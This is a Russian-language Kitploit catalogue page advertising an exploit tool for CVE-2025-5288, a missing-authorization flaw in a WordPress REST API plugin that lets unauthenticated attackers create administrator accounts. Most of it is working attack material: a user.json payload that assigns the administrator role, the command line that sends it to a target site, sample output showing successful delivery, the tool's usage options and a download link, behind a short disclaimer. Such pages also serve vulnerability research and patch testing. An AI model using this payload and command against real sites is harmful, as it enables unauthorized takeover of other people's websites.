Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2025-5288
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2025-5288

CVE-2025-5288

Wordpress REST API | Custom API Generator For Cross Platform And Import Export In WP 1.0.0 - 2.0.3 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий

Репозиторий
341 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 REST API | Custom API Generator For Cross Platform And Import Export In WP 1.0.0 - 2.0.3 - Отсутствие авторизации, приводящее к неаутентифицированному повышению привилегий

📋 Описание

Плагин REST API | Custom API Generator For Cross Platform And Import Export In WP для WordPress уязвим к повышению привилегий из-за отсутствия проверки прав доступа в функции process_handler() в версиях 1.0.0 to 2.0.3. Это позволяет неаутентифицированным злоумышленникам отправить специально созданный файл user.json на открытую конечную точку и создать новую учетную запись Администратора.

  • CVE: CVE-2025-5288  
  • Оценка CVSS: 9.8 (Критическая)  
  • Опубликовано: 12 июня 2025 г.  
  • Последнее обновление: 12 июня 2025 г.  

⚙️ Пояснение к скрипту

Формат полезной нагрузки user.json:

root@kitploit:~
[
  {
    "author_data": {
      "post_author": "Nxploited",
      "post_author_email": "[email protected]",
      "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
  }
]

🚀 Процесс эксплуатации:

root@kitploit:~
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json

Пример вывода:

root@kitploit:~
[+] Target appears vulnerable (version: 2.0.3) - exploiting...

[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:

    [1] {
    "author_data": {
        "post_author": "Nxploited",
        "post_author_email": "[email protected]",
        "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
}

[*] Launching exploitation...

[+] Exploit delivered successfully.

[+] Payload Sent:
[
    {
        "author_data": {
            "post_author": "Nxploited",
            "post_author_email": "[email protected]",
            "post_author_role": "administrator"
        },
        "title": "Nxploited (Khaled_alenazi)",
        "content": "Nxploited (Khaled_alenazi)"
    }
]

🧰 Использование

root@kitploit:~
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]

Неаутентифицированное повышение привилегий - от Khaled Alenazi (Nxploited)

options:
  -h, --help            показать это справочное сообщение и выйти
  -u, --url URL         Базовый URL сайта WordPress (например, http://target/wp/)
  -json, --url_json URL_JSON
                        URL до размещенной полезной нагрузки R.json
  --proxy PROXY         URL прокси (например, http://127.0.0.1:8080)
  --timeout TIMEOUT     Тайм-аут HTTP в секундах (по умолчанию: 10)
  --no-verify           Отключить проверку SSL-сертификата (НЕ рекомендуется!)
  --no-sleep            Отключить задержки для более быстрого выполнения
  --debug               Включить отладочный вывод
                                               

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных и авторизованных целей исследования безопасности. Несанкционированный доступ к системам без разрешения незаконен.


Автор: Nxploited (Khaled_alenazi)

Скачать инструмент